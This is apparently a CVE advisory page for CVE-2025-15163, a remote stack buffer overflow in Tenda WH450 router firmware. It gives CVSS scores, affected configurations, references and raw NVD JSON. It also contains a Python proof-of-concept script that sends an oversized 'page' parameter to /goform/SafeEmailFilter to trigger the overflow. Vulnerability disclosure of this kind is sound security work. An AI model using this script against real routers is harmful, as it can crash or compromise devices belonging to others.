CVE-2025-15163

Description

A vulnerability was identified in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda WH450 < 1.0.0.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

"""
CVE-2025-15163 PoC - Tenda WH450 Stack Buffer Overflow
Target: /goform/SafeEmailFilter endpoint
Vulnerability: Stack-based buffer overflow via page parameter
CVSS: 7.2 (High)
"""

import requests
import sys

def exploit_cve_2025_15163(target_ip, target_port=80):
    """
    Exploit CVE-2025-15163 - Stack buffer overflow in Tenda WH450
    
    Args:
        target_ip: Target router IP address
        target_port: Target HTTP port (default: 80)
    
    Returns:
        bool: True if exploit sent successfully, False otherwise
    """
    # Construct the target URL
    url = f"http://{target_ip}:{target_port}/goform/SafeEmailFilter"
    
    # Create overflow payload - 1000 bytes to trigger overflow
    # Adjust length based on actual buffer size
    overflow_length = 1000
    overflow_payload = "A" * overflow_length
    
    # Prepare the data payload
    data = {
        "page": overflow_payload,
        "action": "save"
    }
    
    try:
        # Send the malicious request
        response = requests.post(url, data=data, timeout=10)
        print(f"[*] Exploit payload sent to {url}")
        print(f"[*] Payload length: {overflow_length} bytes")
        print(f"[*] Response status: {response.status_code}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error sending exploit: {e}")
        return False

def check_vulnerability(target_ip, target_port=80):
    """
    Check if target is vulnerable to CVE-2025-15163
    """
    url = f"http://{target_ip}:{target_port}/goform/SafeEmailFilter"
    
    try:
        # Send normal request to check if endpoint exists
        response = requests.get(url, timeout=10)
        if response.status_code in [200, 400, 500]:
            print(f"[+] Target {target_ip} has /goform/SafeEmailFilter endpoint")
            return True
    except:
        pass
    
    print(f"[-] Target {target_ip} does not appear to be vulnerable")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_15163.py <target_ip> [port]")
        print("Example: python cve_2025_15163.py 192.168.0.1 80")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    print(f"[*] Checking target: {target}:{port}")
    check_vulnerability(target, port)
    
    print("[*] Sending exploit payload...")
    exploit_cve_2025_15163(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15163
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15163
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15163/
[4] VulDB https://vuldb.com/cve/CVE-2025-15163
[5] https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeEmailFilter/SafeEmailFilter.md
[6] https://vuldb.com/?ctiid.338538
[7] https://vuldb.com/?id.338538
[8] https://vuldb.com/?submit.721214
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15163", "sourceIdentifier": "[email protected]", "published": "2025-12-29T01:15:53.347", "lastModified": "2025-12-30T21:38:48.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:C/I:C/A:C", "baseScore": 8.3, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 6.4, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "D139CB33-CD57-41A7-93EF-E84B1F6D2814"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:*", "matchCriteriaId": "395B4439-4840-4353-B963-B82AC569E265"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeEmailFilter/SafeEmailFilter.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338538", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338538", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721214", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}